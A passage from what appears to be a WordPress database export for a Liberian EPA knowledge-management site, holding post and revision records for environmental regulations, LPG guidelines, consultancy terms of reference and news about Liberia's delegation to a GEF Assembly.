class=\"column\">\r\n\r\n<strong>Maximum Permissible Intrusive Noise Levels</strong>\r\nNoise limits for automobiles (from 7.5 meters in dB(A) at the manufacturing stage)\r\nDomestic appliances and construction equipment at the Manufacturing Stage\r\nMaximum Permissible Noise Levels for Construction Sites\r\nMaximum Permissible Noise Levels for Mines and Quarries\r\nApplication for a Permit to Emit Noise/ Vibrations in Excess of Permissible Levels\r\nPermit to Emit Noise/ Vibrations in Excess of Permissible\r\nLevels\r\nApplication for a Permit to Carry out Activities\r\nPermit to Emit Noise in Excess\r\nMinimum Requirements for Strategic Noise and Excessive\r\nVibrations Mapping\r\nMinimum Requirements for\r\nAction Plans\r\nImprovement Notice\r\nFees\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n08/29/2025\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nNoise Pollution and Control Regulations, 2025\r\n\r\n</div>\r\n<div class=\"column\">\r\n\r\n<strong>EPA Liberia</strong>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 6\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nIN EXERCISE of the powers conferred by the Environmental Protection &amp; Management Act (Section 41, 42 &amp; 43), the Environmental Protection Agency makes the following Regulations:\r\n\r\n</div>\r\n</div>\r\n</div>','NOISE POLLUTION AND CONTROL REGULATION Validated October 31, 2025','','inherit','closed','closed','','5917-revision-v1','','','2026-05-27 17:17:22','2026-05-27 17:17:22','',5917,'https://ekmsliberia.info/?p=5920',0,'revision','',0),(5921,38,'2025-03-26 23:38:46','2025-03-26 23:38:46','<strong>REGULATORY INSTRUMENT</strong>\r\n\r\nIN EXERCISE of the powers conferred by (Part XI Sections 101) of the\r\nEnvironmental Protection &amp; Management Law of Liberia, and the Freedom\r\nof Information Act of Liberia (FOIA), Aligned with the UNECE Aarhus\r\nConvention, the Equator Principles, and International Good Practice, the\r\nEnvironment Protection Agency promulgate the following Regulations:\r\n\r\n&nbsp;','Policy and Guideline for Access to Environmental  Information','','publish','closed','closed','','policy-and-guideline-for-access-to-environmental-information','','','2026-05-28 08:49:06','2026-05-28 08:49:06','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5921',3,'document','',0),(5922,38,'2026-05-28 08:31:18','2026-05-28 08:31:18','','Screenshot 2026-05-28 at 08.27.28','','inherit','open','closed','','screenshot-2026-05-28-at-08-27-28','','','2026-05-28 08:31:18','2026-05-28 08:31:18','',5921,'https://ekmsliberia.info/wp-content/uploads/2026/05/Screenshot-2026-05-28-at-08.27.28.png',0,'attachment','image/png',0),(5923,38,'2026-05-28 08:34:11','2026-05-28 08:34:11','','Guideline and Policy Access Environmental Information-EPA-Final (2)','','inherit','open','closed','','guideline-and-policy-access-environmental-information-epa-final-2','','','2026-05-28 08:34:11','2026-05-28 08:34:11','',5921,'https://ekmsliberia.info/wp-content/uploads/2026/05/Guideline-and-Policy-Access-Environmental-Information-EPA-Final-2.pdf',0,'attachment','application/pdf',0),(5924,38,'2026-05-28 08:35:53','2026-05-28 08:35:53','<strong>REGULATORY INSTRUMENT</strong>\r\n\r\nIN EXERCISE of the powers conferred by (Part XI Sections 101) of the\r\nEnvironmental Protection &amp; Management Law of Liberia, and the Freedom\r\nof Information Act of Liberia (FOIA), Aligned with the UNECE Aarhus\r\nConvention, the Equator Principles, and International Good Practice, the\r\nEnvironment Protection Agency promulgate the following Regulations:\r\n\r\n&nbsp;','Policy and Guideline for Access to Environmental  Information','','inherit','closed','closed','','5921-revision-v1','','','2026-05-28 08:35:53','2026-05-28 08:35:53','',5921,'https://ekmsliberia.info/?p=5924',0,'revision','',0),(5925,38,'2025-03-25 08:39:10','2025-03-25 08:39:10','<strong>BACKGROUND</strong>\r\nAs part of its mandate under Part IV Sections 37 &amp; 38 and Part V Section 52 of the Environmental Protection Agency Act and Part IV Section 37(d) and Part V Section 52 of the Environmental Protection and Management Law of Liberia, the EPA formulates these guidelines for subsequent promulgation.\r\n\r\nThese guidelines are intended for person(s), companies and other stakeholders\r\ninvolved in any act of importation, handling, transportation, and storage of Liquified Petroleum Gas (LPG) or its admixtures in Liberia.\r\nThese guidelines is to ensure the safe, efficient, and environmentally sound management of LPG to protect human health, property, and the environment of Liberia. These guidelines apply to all stakeholders (importers, transporters, and storage operators) involved in the LPG value chain.\r\nThe term LPG embraces several products which, while related, have important physical\r\ndifferences which affect safety. Admixtures are raw materials blended to produce LPG.','GUIDELINES FOR THE IMPORTATION, TRANSPORTATION, HANDLING AND STORAGE OF LIQUIFIED PETROLEUM GAS (LPG) IN  LIBERIA','','publish','closed','closed','','guidelines-for-the-importation-transportation-handling-and-storage-of-liquified-petroleum-gas-lpg-in-liberia','','','2026-05-28 08:47:37','2026-05-28 08:47:37','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5925',2,'document','',0),(5926,38,'2026-05-28 08:41:55','2026-05-28 08:41:55','','Screenshot 2026-05-28 at 08.38.22','','inherit','open','closed','','screenshot-2026-05-28-at-08-38-22','','','2026-05-28 08:41:55','2026-05-28 08:41:55','',5925,'https://ekmsliberia.info/wp-content/uploads/2026/05/Screenshot-2026-05-28-at-08.38.22.png',0,'attachment','image/png',0),(5927,38,'2026-05-28 08:42:54','2026-05-28 08:42:54','','LPG GUIDELINES -EPA-Final (2)','','inherit','open','closed','','lpg-guidelines-epa-final-2','','','2026-05-28 08:42:54','2026-05-28 08:42:54','',5925,'https://ekmsliberia.info/wp-content/uploads/2026/05/LPG-GUIDELINES-EPA-Final-2.pdf',0,'attachment','application/pdf',0),(5928,38,'2026-05-28 08:45:54','2026-05-28 08:45:54','<strong>BACKGROUND</strong>\r\nAs part of its mandate under Part IV Sections 37 &amp; 38 and Part V Section 52 of the Environmental Protection Agency Act and Part IV Section 37(d) and Part V Section 52 of the Environmental Protection and Management Law of Liberia, the EPA formulates these guidelines for subsequent promulgation.\r\n\r\nThese guidelines are intended for person(s), companies and other stakeholders\r\ninvolved in any act of importation, handling, transportation, and storage of Liquified Petroleum Gas (LPG) or its admixtures in Liberia.\r\nThese guidelines is to ensure the safe, efficient, and environmentally sound management of LPG to protect human health, property, and the environment of Liberia. These guidelines apply to all stakeholders (importers, transporters, and storage operators) involved in the LPG value chain.\r\nThe term LPG embraces several products which, while related, have important physical\r\ndifferences which affect safety. Admixtures are raw materials blended to produce LPG.','GUIDELINES FOR THE IMPORTATION, TRANSPORTATION, HANDLING AND STORAGE OF LIQUIFIED PETROLEUM GAS (LPG) IN  LIBERIA','','inherit','closed','closed','','5925-revision-v1','','','2026-05-28 08:45:54','2026-05-28 08:45:54','',5925,'https://ekmsliberia.info/?p=5928',0,'revision','',0),(5930,38,'2026-05-30 18:37:38','2026-05-30 18:37:38','<!-- wp:paragraph -->\n<p>Samarkand, Uzbekistan — May 30, 2026: A high-level Liberian delegation is participating in the 8th Assembly of the Global Environment Facility (GEF) and the 71st Meeting of the GEF Council in Samarkand, Uzbekistan.<br>The 8th GEF Assembly is being held from May 30 to June 6, 2026, while the 71st GEF Council Meeting is scheduled from May 31 to June 3, 2026. According to the GEF, the Council meeting brings together country representatives to consider policies, strategic directions, work programs, and financing decisions under the GEF family of funds. The Assembly, which is the highest governing body of the GEF, convenes every four years and brings together the GEF’s 186 member countries to discuss global environmental priorities, financing solutions, and partnerships for addressing climate change, biodiversity loss, land degradation, chemicals and waste, and other major environmental challenges. (thegef.org)<br>Liberia’s participation is significant because the country continues to benefit from GEF support in the areas of climate resilience, biodiversity conservation, coastal defense, sustainable land management, and improved environmental governance. The GEF remains one of Liberia’s most important multilateral partners for mobilizing grants and technical support to address urgent environmental and climate challenges.<br>As part of the ongoing meetings, Liberia participated in the West African Constituency Meeting, where countries within the constituency discussed common priorities, challenges, and positions ahead of the Council deliberations. Liberia was represented by Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the Environmental Protection Agency of Liberia and Operational Focal Point for the GEF; Mr. Benjamin Karmorh, Chief Technical Advisor; and Mr. Desmond Thompson, Alternative Operational Focal Point.<br>Speaking during the meeting, Dr. Urey Yarkpawolo expressed Liberia’s appreciation to the GEF for its continued support to the country. He informed the gathering that Liberia is currently implementing a US$10 million coastal defense project and that, this week, the country launched another US$10 million project supporting agriculture, fisheries, tourism, and related biodiversity initiatives.<br>Dr. Urey Yarkpawolo also raised concern about the GEF’s high co-financing expectation, noting that the current 7:1 co-financing ratio means that for every US$1 provided by the GEF, a beneficiary country is expected to demonstrate US$7 in co-financing. He emphasized that such a requirement is very high for vulnerable and least developed countries like Liberia, which are already facing serious fiscal constraints while responding to climate change, coastal erosion, biodiversity loss, and other environmental threats. The GEF indicated that the matter would be looked into.<br>Dr. Urey Yarkpawolo also highlighted the urgency of sea level rise and associated sea erosion. He emphasized that Liberia’s coastal cities and communities are all threatened by sea erosion, and urged the GEF to consider including sea level rise and coastal erosion in future planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberian delegation reaffirmed the country’s commitment to strengthening its partnership with the GEF and ensuring that GEF-funded projects deliver direct benefits to communities, ecosystems, and national development priorities. Liberia will continue to advocate for financing arrangements that recognize the special circumstances of least developed countries, especially those on the frontlines of climate change.<br>The Council meeting will continue tomorrow, with further discussions expected on financing, programming priorities, and strategic directions for future GEF support.<br>Signed:<br>Environmental Protection Agency of Liberia</p>\n<!-- /wp:paragraph -->','Liberian Delegation Participates in the 8th GEF Assembly and 71st GEF Council Meeting in Samarkand, Uzbekistan','','publish','open','open','','liberian-delegation-participates-in-the-8th-gef-assembly-and-71st-gef-council-meeting-in-samarkand-uzbekistan','','','2026-05-30 18:37:41','2026-05-30 18:37:41','',0,'https://ekmsliberia.info/?p=5930',8,'post','',0),(5931,38,'2026-05-30 18:36:37','2026-05-30 18:36:37','','today now','','inherit','open','closed','','today-now','','','2026-05-30 18:36:37','2026-05-30 18:36:37','',5930,'https://ekmsliberia.info/wp-content/uploads/2026/05/today-now.jpeg',0,'attachment','image/jpeg',0),(5932,38,'2026-05-30 18:37:38','2026-05-30 18:37:38','<!-- wp:paragraph -->\n<p>Samarkand, Uzbekistan — May 30, 2026: A high-level Liberian delegation is participating in the 8th Assembly of the Global Environment Facility (GEF) and the 71st Meeting of the GEF Council in Samarkand, Uzbekistan.<br>The 8th GEF Assembly is being held from May 30 to June 6, 2026, while the 71st GEF Council Meeting is scheduled from May 31 to June 3, 2026. According to the GEF, the Council meeting brings together country representatives to consider policies, strategic directions, work programs, and financing decisions under the GEF family of funds. The Assembly, which is the highest governing body of the GEF, convenes every four years and brings together the GEF’s 186 member countries to discuss global environmental priorities, financing solutions, and partnerships for addressing climate change, biodiversity loss, land degradation, chemicals and waste, and other major environmental challenges. (thegef.org)<br>Liberia’s participation is significant because the country continues to benefit from GEF support in the areas of climate resilience, biodiversity conservation, coastal defense, sustainable land management, and improved environmental governance. The GEF remains one of Liberia’s most important multilateral partners for mobilizing grants and technical support to address urgent environmental and climate challenges.<br>As part of the ongoing meetings, Liberia participated in the West African Constituency Meeting, where countries within the constituency discussed common priorities, challenges, and positions ahead of the Council deliberations. Liberia was represented by Dr. Emmanuel K. Urey Yarkpawolo, Executive Director of the Environmental Protection Agency of Liberia and Operational Focal Point for the GEF; Mr. Benjamin Karmorh, Chief Technical Advisor; and Mr. Desmond Thompson, Alternative Operational Focal Point.<br>Speaking during the meeting, Dr. Urey Yarkpawolo expressed Liberia’s appreciation to the GEF for its continued support to the country. He informed the gathering that Liberia is currently implementing a US$10 million coastal defense project and that, this week, the country launched another US$10 million project supporting agriculture, fisheries, tourism, and related biodiversity initiatives.<br>Dr. Urey Yarkpawolo also raised concern about the GEF’s high co-financing expectation, noting that the current 7:1 co-financing ratio means that for every US$1 provided by the GEF, a beneficiary country is expected to demonstrate US$7 in co-financing. He emphasized that such a requirement is very high for vulnerable and least developed countries like Liberia, which are already facing serious fiscal constraints while responding to climate change, coastal erosion, biodiversity loss, and other environmental threats. The GEF indicated that the matter would be looked into.<br>Dr. Urey Yarkpawolo also highlighted the urgency of sea level rise and associated sea erosion. He emphasized that Liberia’s coastal cities and communities are all threatened by sea erosion, and urged the GEF to consider including sea level rise and coastal erosion in future planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberian delegation reaffirmed the country’s commitment to strengthening its partnership with the GEF and ensuring that GEF-funded projects deliver direct benefits to communities, ecosystems, and national development priorities. Liberia will continue to advocate for financing arrangements that recognize the special circumstances of least developed countries, especially those on the frontlines of climate change.<br>The Council meeting will continue tomorrow, with further discussions expected on financing, programming priorities, and strategic directions for future GEF support.<br>Signed:<br>Environmental Protection Agency of Liberia</p>\n<!-- /wp:paragraph -->','Liberian Delegation Participates in the 8th GEF Assembly and 71st GEF Council Meeting in Samarkand, Uzbekistan','','inherit','closed','closed','','5930-revision-v1','','','2026-05-30 18:37:38','2026-05-30 18:37:38','',5930,'https://ekmsliberia.info/?p=5932',0,'revision','',0),(5935,38,'2026-06-09 17:09:31','2026-06-09 17:09:31','<strong>Project Background</strong>\r\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in collaboration with the Society for the Conservation of Nature of Liberia, received funding from the\r\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to implement a five-year project titled “Strengthening Conservation and Effective Governance of\r\nLiberia’s Critical Forests in the Northwest Liberia Landscape”.\r\n\r\nThe project’s objective is to enhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by promoting integrated and inclusive management of intact forest landscapes, including protected areas, and supporting collaborative transboundary watershed management through five components:\r\n1: Establishment of proposed protected areas and promote the effective management of existing protected areas;\r\n\r\n2: Promotion of innovative climate-resilient and conservation-friendly livelihoods and enterprises;\r\n\r\n3: Strengthening transboundary watershed and forest landscape management;\r\n\r\n4: Capacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\r\nand Evaluation (M&amp;E) Framework. For more information about the project, please refer to this link HERE.\r\nThe results of this project will contribute to the success of the Guinean Forests Integrated Program (GFIP), aligning with the program\'s objectives to promote sustainable forest management and\r\nenvironmental resilience across the region.\r\n\r\n<strong>Objective of the Assignment</strong>\r\nThe primary objective is to hire a qualified National Consultant to develop a comprehensive Knowledge Management and Communications Strategy (KMC Strategy) for the project. This\r\nstrategy will provide a structured approach to systematically capture lessons learned, best practices, and data generated by the project, and to communicate them effectively to diverse audiences,\r\nincluding local communities, government agencies, donors, and regional partners.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_KMCS.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultancy to Develop a Project Knowledge Management and Communications  Strategy','','publish','closed','closed','','national-consultancy-to-develop-a-project-knowledge-management-and-communications-strategy','','','2026-06-09 17:25:29','2026-06-09 17:25:29','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5935',6,'ekms_bulletin','',0),(5936,38,'2026-06-09 17:06:29','2026-06-09 17:06:29','<strong>Project Background</strong>\r\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in\r\ncollaboration with the Society for the Conservation of Nature of Liberia, received funding from the\r\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to\r\nimplement a five-year project titled “Strengthening Conservation and Effective Governance of\r\nLiberia’s Critical Forests in the Northwest Liberia Landscape”. The project’s objective is to\r\nenhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by\r\npromoting integrated and inclusive management of intact forest landscapes, including protected\r\nareas, and supporting collaborative transboundary watershed management through five components:\r\n1: Establishment of proposed protected areas and promote the effective management of existing\r\nprotected areas; 2: Promotion of innovative climate-resilient and conservation-friendly livelihoods\r\nand enterprises; 3: Strengthening transboundary watershed and forest landscape management; 4:\r\nCapacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\r\nand Evaluation (M&amp;E) Framework. For more information about the project, please refer to this link\r\nHERE.\r\nThe results of this project will contribute to the success of the Guinean Forests Integrated Program\r\n(GFIP), aligning with the program\'s objectives to promote sustainable forest management and\r\nenvironmental resilience across the region.\r\n\r\n&nbsp;\r\n\r\n<strong>Objective of the Assignment</strong>\r\nThe primary objective is to hire a qualified National Consultant to develop a comprehensive\r\nKnowledge Management and Communications Strategy (KMC Strategy) for the project. This\r\nstrategy will provide a structured approach to systematically capture lessons learned, best practices,\r\nand data generated by the project, and to communicate them effectively to diverse audiences,\r\nincluding local communities, government agencies, donors, and regional partners.\r\n\r\n&nbsp;\r\n\r\nClick to:','National Consultancy to Develop a Project Knowledge Management and Communications  Strategy','','inherit','closed','closed','','5935-revision-v1','','','2026-06-09 17:06:29','2026-06-09 17:06:29','',5935,'https://ekmsliberia.info/?p=5936',0,'revision','',0),(5937,38,'2026-06-09 17:08:06','2026-06-09 17:08:06','','Final_TOR_KMCS','','inherit','open','closed','','final_tor_kmcs','','','2026-06-09 17:08:06','2026-06-09 17:08:06','',0,'https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_KMCS.pdf',0,'attachment','application/pdf',0),(5938,38,'2026-06-09 17:09:31','2026-06-09 17:09:31','<strong>Project Background</strong>\r\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in\r\ncollaboration with the Society for the Conservation of Nature of Liberia, received funding from the\r\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to\r\nimplement a five-year project titled “Strengthening Conservation and Effective Governance of\r\nLiberia’s Critical Forests in the Northwest Liberia Landscape”. The project’s objective is to\r\nenhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by\r\npromoting integrated and inclusive management of intact forest landscapes, including protected\r\nareas, and supporting collaborative transboundary watershed management through five components:\r\n1: Establishment of proposed protected areas and promote the effective management of existing\r\nprotected areas; 2: Promotion of innovative climate-resilient and conservation-friendly livelihoods\r\nand enterprises; 3: Strengthening transboundary watershed and forest landscape management; 4:\r\nCapacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\r\nand Evaluation (M&amp;E) Framework. For more information about the project, please refer to this link\r\nHERE.\r\nThe results of this project will contribute to the success of the Guinean Forests Integrated Program\r\n(GFIP), aligning with the program\'s objectives to promote sustainable forest management and\r\nenvironmental resilience across the region.\r\n\r\n&nbsp;\r\n\r\n<strong>Objective of the Assignment</strong>\r\nThe primary objective is to hire a qualified National Consultant to develop a comprehensive\r\nKnowledge Management and Communications Strategy (KMC Strategy) for the project. This\r\nstrategy will provide a structured approach to systematically capture lessons learned, best practices,\r\nand data generated by the project, and to communicate them effectively to diverse audiences,\r\nincluding local communities, government agencies, donors, and regional partners.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_KMCS.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultancy to Develop a Project Knowledge Management and Communications  Strategy','','inherit','closed','closed','','5935-revision-v1','','','2026-06-09 17:09:31','2026-06-09 17:09:31','',5935,'https://ekmsliberia.info/?p=5938',0,'revision','',0),(5939,38,'2026-06-09 17:21:21','2026-06-09 17:21:21','<strong>Project Background</strong>\r\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in collaboration with the Society for the Conservation of Nature of Liberia, received funding from the\r\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to implement a five-year project titled “Strengthening Conservation and Effective Governance of\r\nLiberia’s Critical Forests in the Northwest Liberia Landscape”.\r\n\r\nThe project’s objective is to enhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by promoting integrated and inclusive management of intact forest landscapes, including protected areas, and supporting collaborative transboundary watershed management through five components:\r\n1: Establishment of proposed protected areas and promote the effective management of existing protected areas;\r\n\r\n2: Promotion of innovative climate-resilient and conservation-friendly livelihoods and enterprises;\r\n\r\n3: Strengthening transboundary watershed and forest landscape management;\r\n\r\n4:Capacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\r\nand Evaluation (M&amp;E) Framework. For more information about the project, please refer to this link\r\nHERE.\r\n\r\n&nbsp;\r\n\r\n<strong>Objective of the Assignment</strong>\r\nThe primary objective is to hire a qualified National Consultant to develop a standardized Project Operations Manual (POM). This manual will serve as the definitive guide for the Project\r\nManagement Unit (PMU), executing partners, and stakeholders to ensure efficiency, transparency, and compliance with GEF/CI-GEF guidelines, aligning with GOL guidelines, where applicable, as follows:\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_POM.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Terms of Reference (TOR)  National Consultancy to Develop a Project Operations Manual (POM)','','publish','closed','closed','','terms-of-reference-tor-national-consultancy-to-develop-a-project-operations-manual-pom','','','2026-06-09 17:21:21','2026-06-09 17:21:21','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5939',5,'ekms_bulletin','',0),(5940,38,'2026-06-09 17:20:04','2026-06-09 17:20:04','<strong>Project Background</strong>\r\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in collaboration with the Society for the Conservation of Nature of Liberia, received funding from the\r\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to implement a five-year project titled “Strengthening Conservation and Effective Governance of\r\nLiberia’s Critical Forests in the Northwest Liberia Landscape”.\r\n\r\nThe project’s objective is to enhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by promoting integrated and inclusive management of intact forest landscapes, including protected areas, and supporting collaborative transboundary watershed management through five components:\r\n1: Establishment of proposed protected areas and promote the effective management of existing protected areas;\r\n\r\n2: Promotion of innovative climate-resilient and conservation-friendly livelihoods and enterprises;\r\n\r\n3: Strengthening transboundary watershed and forest landscape management;\r\n\r\n4:Capacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\r\nand Evaluation (M&amp;E) Framework. For more information about the project, please refer to this link\r\nHERE.\r\n\r\n&nbsp;\r\n\r\n<strong>Objective of the Assignment</strong>\r\nThe primary objective is to hire a qualified National Consultant to develop a standardized Project Operations Manual (POM). This manual will serve as the definitive guide for the Project\r\nManagement Unit (PMU), executing partners, and stakeholders to ensure efficiency, transparency, and compliance with GEF/CI-GEF guidelines, aligning with GOL guidelines, where applicable, as follows:\r\n\r\nClick to:','Terms of Reference (TOR)  National Consultancy to Develop a Project Operations Manual (POM)','','inherit','closed','closed','','5939-revision-v1','','','2026-06-09 17:20:04','2026-06-09 17:20:04','',5939,'https://ekmsliberia.info/?p=5940',0,'revision','',0),(5941,38,'2026-06-09 17:20:28','2026-06-09 17:20:28','','Final_TOR_POM','','inherit','open','closed','','final_tor_pom','','','2026-06-09 17:20:28','2026-06-09 17:20:28','',0,'https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_POM.pdf',0,'attachment','application/pdf',0),(5942,38,'2026-06-09 17:21:21','2026-06-09 17:21:21','<strong>Project Background</strong>\r\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in collaboration with the Society for the Conservation of Nature of Liberia, received funding from the\r\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to implement a five-year project titled “Strengthening Conservation and Effective Governance of\r\nLiberia’s Critical Forests in the Northwest Liberia Landscape”.\r\n\r\nThe project’s objective is to enhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by promoting integrated and inclusive management of intact forest landscapes, including protected areas, and supporting collaborative transboundary watershed management through five components:\r\n1: Establishment of proposed protected areas and promote the effective management of existing protected areas;\r\n\r\n2: Promotion of innovative climate-resilient and conservation-friendly livelihoods and enterprises;\r\n\r\n3: Strengthening transboundary watershed and forest landscape management;\r\n\r\n4:Capacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\r\nand Evaluation (M&amp;E) Framework. For more information about the project, please refer to this link\r\nHERE.\r\n\r\n&nbsp;\r\n\r\n<strong>Objective of the Assignment</strong>\r\nThe primary objective is to hire a qualified National Consultant to develop a standardized Project Operations Manual (POM). This manual will serve as the definitive guide for the Project\r\nManagement Unit (PMU), executing partners, and stakeholders to ensure efficiency, transparency, and compliance with GEF/CI-GEF guidelines, aligning with GOL guidelines, where applicable, as follows:\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_POM.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Terms of Reference (TOR)  National Consultancy to Develop a Project Operations Manual (POM)','','inherit','closed','closed','','5939-revision-v1','','','2026-06-09 17:21:21','2026-06-09 17:21:21','',5939,'https://ekmsliberia.info/?p=5942',0,'revision','',0),(5943,38,'2026-06-09 17:24:43','2026-06-09 17:24:43','<strong>Project Background</strong>\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in collaboration with the Society for the Conservation of Nature of Liberia, received funding from the\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to implement a five-year project titled “Strengthening Conservation and Effective Governance of\nLiberia’s Critical Forests in the Northwest Liberia Landscape”.\n\nThe project’s objective is to enhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by promoting integrated and inclusive management of intact forest landscapes, including protected areas, and supporting collaborative transboundary watershed management through five components:\n1: Establishment of proposed protected areas and promote the effective management of existing protected areas;\n\n2: Promotion of innovative climate-resilient and conservation-friendly livelihoods and enterprises;\n\n3: Strengthening transboundary watershed and forest landscape management; 4:\nCapacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\nand Evaluation (M&amp;E) Framework. For more information about the project, please refer to this link\nHERE.\nThe results of this project will contribute to the success of the Guinean Forests Integrated Program\n(GFIP), aligning with the program\'s objectives to promote sustainable forest management and\nenvironmental resilience across the region.\n\n&nbsp;\n\n<strong>Objective of the Assignment</strong>\nThe primary objective is to hire a qualified National Consultant to develop a comprehensive\nKnowledge Management and Communications Strategy (KMC Strategy) for the project. This\nstrategy will provide a structured approach to systematically capture lessons learned, best practices,\nand data generated by the project, and to communicate them effectively to diverse audiences,\nincluding local communities, government agencies, donors, and regional partners.\n\n&nbsp;\n\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_KMCS.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultancy to Develop a Project Knowledge Management and Communications  Strategy','','inherit','closed','closed','','5935-autosave-v1','','','2026-06-09 17:24:43','2026-06-09 17:24:43','',5935,'https://ekmsliberia.info/?p=5943',0,'revision','',0),(5944,38,'2026-06-09 17:25:29','2026-06-09 17:25:29','<strong>Project Background</strong>\r\nThe Government of Liberia, through the Environmental Protection Agency of Liberia, in collaboration with the Society for the Conservation of Nature of Liberia, received funding from the\r\nGlobal Environment Facility (GEF) through Conservation International GEF Agency (CI-GEF) to implement a five-year project titled “Strengthening Conservation and Effective Governance of\r\nLiberia’s Critical Forests in the Northwest Liberia Landscape”.\r\n\r\nThe project’s objective is to enhance ecosystem services and improve socioeconomic conditions in Northwest Liberia by promoting integrated and inclusive management of intact forest landscapes, including protected areas, and supporting collaborative transboundary watershed management through five components:\r\n1: Establishment of proposed protected areas and promote the effective management of existing protected areas;\r\n\r\n2: Promotion of innovative climate-resilient and conservation-friendly livelihoods and enterprises;\r\n\r\n3: Strengthening transboundary watershed and forest landscape management;\r\n\r\n4: Capacity building and strengthened collaboration, learning, and knowledge sharing; 5: Monitoring\r\nand Evaluation (M&amp;E) Framework. For more information about the project, please refer to this link HERE.\r\nThe results of this project will contribute to the success of the Guinean Forests Integrated Program (GFIP), aligning with the program\'s objectives to promote sustainable forest management and\r\nenvironmental resilience across the region.\r\n\r\n<strong>Objective of the Assignment</strong>\r\nThe primary objective is to hire a qualified National Consultant to develop a comprehensive Knowledge Management and Communications Strategy (KMC Strategy) for the project. This\r\nstrategy will provide a structured approach to systematically capture lessons learned, best practices, and data generated by the project, and to communicate them effectively to diverse audiences,\r\nincluding local communities, government agencies, donors, and regional partners.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final_TOR_KMCS.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultancy to Develop a Project Knowledge Management and Communications  Strategy','','inherit','closed','closed','','5935-revision-v1','','','2026-06-09 17:25:29','2026-06-09 17:25:29','',5935,'https://ekmsliberia.info/?p=5944',0,'revision','',0),(5945,38,'2026-06-09 17:31:47','2026-06-09 17:31:47','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia has reaffirmed its commitment to transforming the country’s transport sector through the implementation and enforcement of cleaner fuel and vehicle emission standards aimed at improving air quality, protecting public health,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and supporting national climate ambitions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Addressing participants at the National Dissemination Workshop on Promoting Cleaner Fuels and Vehicle Strategies in Liberia at the Royal Ambassador Hotel in Margibi County, the Deputy Executive Director for Administration, Hon. Anthony S. Kollie, underscored the growing environmental and health concerns associated with aging vehicles and poor fuel quality. He noted that the rapid expansion of Liberia’s vehicle fleet, coupled with the continued importation of high-emitting vehicles and fuels, presents significant challenges to the country’s sustainable development and climate objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Supported by the Climate and Clean Air Coalition (CCAC) and implemented with technical assistance from the United Nations Environment Programme (UNEP), the initiative has produced a comprehensive assessment of Liberia’s fuel quality and vehicle efficiency landscape. The assessment provides critical evidence and strategic recommendations to guide policy reforms, strengthen regulatory frameworks, enhance compliance monitoring and support the adoption of cleaner transport solutions nationwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hon. Kollie emphasized that the EPA will work closely with key government institutions, private sector actors, transport unions, civil society organizations and development partners to ensure that the findings are translated into practical and enforceable measures. These efforts will include public awareness campaigns, institutional capacity strengthening, stakeholder engagement, and robust enforcement 